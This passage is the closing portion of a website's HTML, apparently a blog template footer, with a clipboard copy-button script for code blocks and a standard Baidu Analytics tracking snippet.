      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?05441306932d71b1dba39f817847ce3e";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
